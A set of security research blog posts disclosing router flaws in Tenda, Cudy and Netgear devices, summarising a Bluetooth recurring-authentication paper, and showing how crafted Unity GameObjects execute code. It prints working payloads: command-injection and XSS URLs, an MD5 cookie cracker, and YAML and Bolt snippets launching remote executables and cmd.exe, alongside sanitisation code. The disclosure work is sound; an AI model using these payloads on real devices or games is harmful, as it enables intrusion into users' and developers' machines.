The next two devices that came across my desk for IoT research practice were the Cudy WR1300 and the Tenda AC6V2. While not quite as vulnerable as the WAVLINK, they were both quite vulnerable in their ‘default’ state. That is, if someone were to purchase one and just plug in an Ethernet cable, it would work perfectly well, but attackers could easily exploit gaps in the web management interfaces.

The Tenda AC6v2

For this device, exploitation is trivial if the device hasn’t been provisioned. Since you plug it in and It Just Works, this is fairly likely. Even if a victim has set a password, attacks are still possible if the victim is logged into the web interface or the attacker can guess or crack the password.

We ended up reporting several findings:

  1. CSRF throughout the web console (CVE-2021-32118).
  2. Command injection in the NTP configuration (CVE-2021-32119).
  3. MD5-hashed user passwords stored in a cookie (CVE-2021-32117).
  4. The aforementioned gap introduced by not requiring users to complete web provisioning before use (CVE-2021-32116).
  5. The sysinit endpoint remaining active after setup, allowing it to be used to set the device password (CVE-2021-32120).

Only findings 1 and 2 are required for remote compromise. We reported these back in May and received no response, and the firmware has not been updated at the time of writing this post.
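Finding 3 is worth dwelling on for a moment: an unsalted MD5 of the password in a cookie means anyone who can read that cookie can attack it offline. A minimal Python sketch of that offline attack, assuming the cookie holds a bare hex digest:

```python
import hashlib

def crack_md5_cookie(cookie_hash: str, wordlist):
    """Offline dictionary attack against an unsalted MD5 cookie value.

    Illustrates why exposing MD5(password) to anything that can read the
    cookie is dangerous: no interaction with the device is needed.
    """
    target = cookie_hash.lower()
    for guess in wordlist:
        if hashlib.md5(guess.encode()).hexdigest() == target:
            return guess
    return None
```

In practice an attacker would feed this a large password list (or use a GPU cracker); MD5 is fast enough that weak passwords fall quickly.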

The Cudy WR1300

For this device, users are not prompted to change the default password (admin), even if they happen to log into the web interface to set the device up (CVE-2021-32112). The console login is also vulnerable to CSRF, which is a nasty combination. Once logged in, users can be redirected to a page that is vulnerable to reflected XSS (CVE-2021-32114), something like:

http://192.168.10.1/cgi-bin/luci/admin/network/bandwidth?iface=wlan10&icon=icon-wifi&i18name=<script>yesitsjustthateasy</script>

This enables an attacker to bypass the CSRF protections on other pages. Of particular interest are the network utilities, each of which (ping/traceroute/nslookup) is vulnerable to command injection (CVE-2021-32115). To sum it all up, the exploit chain ends up looking as follows:

  1. Use CSRF to log into the web console (admin/admin).
  2. Redirect to the page vulnerable to cross-site scripting.
  3. Bypass CSRF protections in order to exploit command injection in the ping test feature.

We reported these findings to Cudy in May as well, and they have released new firmware for this device. We haven’t been able to verify the fixes; however, we recommend updating to the most recent firmware if you happen to have one of these devices.
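To make step 3 of the chain concrete, here’s a hedged Python sketch of the classic diagnostic-page injection pattern. The path and parameter name below are hypothetical (the actual Cudy endpoint and field names may differ); the point is how a shell metacharacter turns a ping target into arbitrary command execution:

```python
from urllib.parse import quote

def build_ping_injection(cmd: str, host: str = "192.168.10.1") -> str:
    """Build a URL that smuggles a shell command into a ping-test field.

    The endpoint and parameter are placeholders for illustration; the real
    device concatenates the supplied address into a shell command, so a
    ';' terminates the ping and runs the attacker's command.
    """
    injected = "127.0.0.1;" + cmd
    return (f"http://{host}/cgi-bin/luci/admin/network/ping"
            f"?addr={quote(injected)}")
```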

Firmware Downgrades For Fun and Profit

The final device that I ended up taking a look at in this batch is the Netgear EX6120:

The EX6120 is a fairly simple WiFi range extender that’s been on the market for several years now, at about the same price point as the other devices. This is one that I’d actually purchased a couple years prior but hadn’t found a good way to compromise. After finishing up with the other devices, I was hungry for more and so tried hacking on this one again. Coming back to something with a fresh set of eyes can often yield great results, and that was definitely the case for this device.

When I sit down to test one of these devices my first step is always to patch the firmware to the latest version. On a recent assessment I’d found a CSRF vulnerability that was the result of a difference in the Content-Type on a request. Essentially, all POST requests with the typical Content-Type used throughout the application (x-www-form-urlencoded) were routed through some common code that enforced CSRF mitigations. However, a couple endpoints in the application supported file uploads and those used multipart forms which conveniently lacked CSRF protections.

With that fresh in my mind, as I was upgrading the firmware I tried removing the CSRF token in much the same way. Sure enough – it worked! I crossed my fingers and tested against the most recent firmware, and it had not been patched yet. This vulnerability on its own is of limited use, though: as mentioned previously, it’s not all that likely that a victim will be logged into the web console, and that would be required to exploit it.

It didn’t take very long to find a way, though. In a very similar fashion, multipart-form requests did not seem to require authentication at all (CVE-2021-32121). I’ve seen this previously in other applications, and the root cause is often quite similar to the gap in CSRF protections: a request or two uses some fundamentally different way of communicating with the application and as such doesn’t enforce the same restrictions. I can’t confirm the root cause in this specific case, but that’s my best guess 🙂
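To illustrate what “a fundamentally different way of communicating” looks like on the wire, here’s a small Python helper that assembles a multipart/form-data body by hand. The field name and boundary are placeholders, not the actual EX6120 parameters; the takeaway is that a request in this shape bypassed both the CSRF check and authentication:

```python
def build_multipart_body(fields: dict, boundary: str = "x0x0boundary") -> str:
    """Assemble a multipart/form-data body from simple text fields.

    Each field becomes its own boundary-delimited part; the body ends
    with the closing boundary marker.
    """
    parts = []
    for name, value in fields.items():
        parts.append(f"--{boundary}\r\n"
                     f'Content-Disposition: form-data; name="{name}"\r\n'
                     f"\r\n{value}\r\n")
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts)
```

Sending this with a `Content-Type: multipart/form-data; boundary=...` header instead of the usual urlencoded type is what routed the request around the common protection code.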

We reported this to Netgear in May as well, and they got back to us fairly quickly. Updated firmware has been released, however we haven’t verified the fixes.

Final Thoughts

As always, doing this sort of research has been a very rewarding experience. Plenty of bugs found and reported, new techniques learned, and overall just a lot of fun to play around with. The consumer device space feels like something ripped out of time, where we can rewind twenty years to the ‘good old days’ where exploits of this nature were commonplace. We do see some signs of improvement here and there, but as you go to buy your next device consider the following:

  1. Is the device from a recognized brand? How long have they been around? How’s their track record for security vulnerabilities? How have they responded to vulnerabilities in the past?
  2. Cheaper is not always better. It’s absolutely crazy how cheap some of this hardware has become, and you generally get what you pay for. Software security is expensive to do right, and if a deal seems too good to be true, it often is.
  3. Does the device have known vulnerabilities? This can be as simple as searching for ‘<brand> <model> vulnerabilities’.
  4. How likely is it that you’ll log in to install new firmware? If the answer is ‘not often’ (and no judgement if so – many security professionals I know are plenty guilty here!) then consider getting a model with support for automatic updates.

And finally, while this post has covered vulnerabilities in a lot of cheaper devices, sometimes the more expensive ones can be just as vulnerable. Doing a little research can go a long way towards making informed choices. We hope this post helps illustrate just how vulnerable some of these devices can be.

The post Drive-By Compromise: A Tale Of Four Wifi Routers appeared first on Include Security Research Blog.

Issues with Indefinite Trust in Bluetooth

25 August 2021 at 14:37

At IncludeSec we of course love to hack things, but we also love to use our skills and insights into security issues to explore innovative solutions, develop tools, and share resources. In this post we share a summary of a recent paper that I published with fellow researchers in the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec’21). WiSec is a conference well attended by people across industry, government, and academia; it is dedicated to all aspects of security and privacy in wireless and mobile networks and their applications, mobile software platforms, Internet of Things, cyber-physical systems, usable security and privacy, biometrics, and cryptography. 

Overview

Recurring Verification of Interaction Authenticity Within Bluetooth Networks
Travis Peters (Include Security), Timothy Pierson (Dartmouth College), Sougata Sen (BITS Pilani, KK Birla Goa Campus, India), José Camacho (University of Granada, Spain), and David Kotz (Dartmouth College)

The most common forms of authentication are passwords, potentially used in combination with a second factor such as a hardware token or mobile app (i.e., two-factor authentication). These approaches emphasize a one-time, initial authentication. After initial authentication, authenticated entities typically remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires. Unfortunately, explicit deauthentication happens rarely, if ever. To address this issue, recent work has explored how to provide passive, continuous authentication and/or automatic de-authentication by correlating user movements and inputs with actions observed in an application (e.g., a web browser). 

The issue with indefinite trust, however, goes beyond user authentication. Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact as long as the devices exist, or until they transfer ownership (e.g., sold or lost).

The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security makes indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised. Thus, I put forth the argument with my academic research colleagues that one-time, single-factor, device-to-device authentication (i.e., an initial pairing) is not enough, and that there must exist some mechanism to frequently (re-)verify the authenticity of devices and their connections.

In our paper we propose a device-to-device recurring authentication scheme – Verification of Interaction Authenticity (VIA) – that is based on evaluating characteristics of the communications (interactions) between devices. We adapt techniques from wireless traffic analysis and intrusion detection systems to develop behavioral models that capture typical, authentic device interactions (behavior); these models enable recurring verification of device behavior.

Technical Highlights

  • Our recurring authentication scheme is based on off-the-shelf machine learning classifiers (e.g., Random Forest, k-NN) trained on characteristics extracted from Bluetooth/BLE network interactions. 
  • We extract model features from packet headers and payloads. Most of our analysis targets lower-level Bluetooth protocol layers, such as the HCI and L2CAP layers; higher-level BLE protocols, such as ATT, are also information-rich protocol layers. Hybrid models – combining information extracted from various protocol layers – are more complex, but may yield better results.
  • We construct verification models from a combination of fine-grained and coarse-grained features, including n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality (ingress vs. egress). 

Our verification scheme can be deployed anywhere that interposes on Bluetooth communications between two devices. One example we consider is a deployment within a kernel module running on a mobile platform.
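As a toy illustration of the fine-grained features, the following Python sketch counts byte n-grams in packet payloads and projects them onto a fixed vocabulary – the kind of vector an off-the-shelf classifier like Random Forest consumes. It is a simplification of the paper’s feature pipeline, not the actual implementation:

```python
from collections import Counter

def byte_ngrams(payload: bytes, n: int = 2) -> Counter:
    """Count byte n-grams (as int tuples) in one packet payload."""
    return Counter(tuple(payload[i:i + n])
                   for i in range(len(payload) - n + 1))

def feature_vector(packets, vocabulary, n: int = 2):
    """Aggregate n-gram counts over packets onto a fixed-order vocabulary.

    The resulting list of counts can be fed directly to a standard
    classifier; real models would also append packet lengths,
    directionality, and protocol identifiers.
    """
    totals = Counter()
    for p in packets:
        totals += byte_ngrams(p, n)
    return [totals[g] for g in vocabulary]
```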

Other Highlights from the Paper 

  • We collected and presented a new, first-of-its-kind Bluetooth dataset. This dataset captures Bluetooth network traces corresponding to app-device interactions between more than 20 smart-health and smart-home devices. The dataset is open-source and available within the VM linked below.
  • We enhanced open-source Bluetooth analysis software – bluepy and btsnoop – in an effort to improve the available tools for practical exploration of the Bluetooth protocol and Bluetooth-based apps.
  • We presented a novel modeling technique, combined with off-the-shelf machine learning classifiers, for characterizing and verifying authentic Bluetooth/BLE app-device interactions.
  • We implemented our verification scheme and evaluated our approach against a test corpus of 20 smart-home and smart-health devices. Our results show that VIA can be used for verification with an F1-score of 0.86 or better in most test cases.

To learn more, check out our paper as well as a VM pre-loaded with our code and dataset.

Final Notes

Reproducible Research

We are advocates for research that is impactful and reproducible. At WiSec’21 our published work was featured as one of four papers this year that obtained the official replicability badges. These badges signify that our artifacts are available, have been evaluated for accuracy, and that our results were independently reproducible. We thank the ACM and the WiSec organizers for working to make sharing and reproducibility common practice in the publication process. 

Next Steps

In future work we are interested in exploring a few directions:

  • Continue to enhance tooling that supports Bluetooth protocol analysis for research and security assessments
  • Expand our dataset to include more devices, adversarial examples, etc. 
  • Evaluate a real-world deployment (e.g., a smartphone-based multifactor authentication system for Bluetooth); such a deployment would enable us to evaluate practical issues such as verification latency, power consumption, and usability. 

Give us a shout if you are interested in our team doing Bluetooth hacks for your products!

The post Issues with Indefinite Trust in Bluetooth appeared first on Include Security Research Blog.

Hacking Unity Games with Malicious GameObjects

At IncludeSec our clients ask us to hack on all sorts of crazy applications, from mass-scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass-scale video games, so we had a chance to do some research and came up with a somewhat novel approach that may allow attacks against Unity-powered games and game developers.

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject; they’ve been great to work with and continue to make moves internally to maximize the security of their platform. Be sure to check that post out for specific recommendations on how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption, enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle");

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in a near-future augmented-reality world straight out of Ready Player One, an attacker may seek to inject things into a user’s reality to confuse, distract, or annoy them, and that might cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick). Additionally, you can add handlers for events such as PointerClick, PointerEnter, Scroll, etc. to objects using an EventTrigger component.

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type of void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly. You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components). It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
  • m_TargetAssemblyTypeName — This is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
  • m_CallState — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_Mode — Determines the argument type of the called function:
    • 0 – EventDefined
    • 1 – Void
    • 2 – Object
    • 3 – Int
    • 4 – Float
    • 5 – String
    • 6 – Bool
  • m_Target — Specifies the Unity object instance that the method will be called on. Specifying m_Target: {fileID: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload. 

Below is the event definition I used in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be hosted on the internet, but I hosted it on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>

int main() {
  // Write "hello there" to /tmp/hello.
  FILE* fp = fopen("/tmp/hello", "w");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!). Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After poring over the 426 discovered methods, I fell short of getting completely arbitrary code execution from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

  • Unity.CodeEditor.CodeEditor.SetExternalScriptEditor(): Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
  • PlayerPrefs.DeleteAll(): Deletes all save games and other stored data.
  • UnityEditor.FileUtil.UnityDirectoryDelete(): Invokes Directory.Delete() on the specified directory.
  • UnityEngine.ScreenCapture.CaptureScreenshot(): Takes a screenshot of the game window to a specified file, automatically overwriting the file if it already exists. On Windows the path can be a UNC path.
  • UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs(): Adds flags to be passed to the Il2Cpp compiler.
  • UnityEditor.BuildPlayerWindow.BuildPlayerAndRun(): Triggers the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
  • Application.Quit(), EditorApplication.Exit(): Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some systems are more powerful than others. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free.

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection. I think it should be clarified that, using Bolt, imported GameObjects can also achieve arbitrary code execution, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.
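For illustration, the `_json` edit above can also be scripted. This is a hypothetical sketch — the helper name and argument handling are my own, and it assumes only the graph fields shown in the YAML above:

```python
import json

def swap_invoke_member(graph_json, target_type, method, default_values):
    """Rewrite every Bolt.InvokeMember element in an embedded flow graph to
    call a different static method with new string default arguments."""
    graph = json.loads(graph_json)
    for element in graph["nest"]["embed"]["elements"]:
        if element.get("$type") == "Bolt.InvokeMember":
            member = element["member"]
            member["name"] = method
            member["targetType"] = target_type
            member["targetTypeName"] = target_type
            member["parameterTypes"] = ["System.String"] * len(default_values)
            # Bolt prefixes argument names with '%' in defaultValues
            element["defaultValues"] = {
                "%" + name: {"$content": value, "$type": "System.String"}
                for name, value in default_values.items()
            }
    return json.dumps(graph)
```

Called with `("System.Diagnostics.Process", "Start", {"fileName": "cmd.exe", "arguments": "/c calc.exe"})`, it produces the malicious member shown above.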

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator). 

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double-check that Unity validates HTTPS certificates on all platforms your game runs on — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third-parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a whitelist of methods Bolt is allowed to call, then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.” Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended; the surface area is just too large and it’s likely something important will be missed, though a combination of whitelist and blacklist may work with higher confidence.
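As a sketch of that whitelist check (hypothetical names and structure; Bolt’s actual unit model isn’t reproduced here), the core test can be a simple namespace-prefix match on the fully qualified method name, applied to every InvokeMember unit before instantiation:

```python
# Hypothetical allow-list check for dynamically loaded visual-script units.
# Only methods under a dedicated modding namespace are permitted; everything
# else (including all of UnityEngine) is rejected by default.
ALLOWED_NAMESPACES = ("MyCompanyName.ModStuff.",)

def is_allowed(target_type, method):
    """Return True only if the fully qualified method sits inside an
    explicitly allowed namespace."""
    qualified = "%s.%s" % (target_type, method)
    return qualified.startswith(ALLOWED_NAMESPACES)

print(is_allowed("MyCompanyName.ModStuff.Spawner", "SpawnProp"))  # allowed
print(is_allowed("UnityEngine.Application", "OpenURL"))           # rejected
```

Anything your mods legitimately need from UnityEngine would then be wrapped in a method inside the allowed namespace rather than exposed directly.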

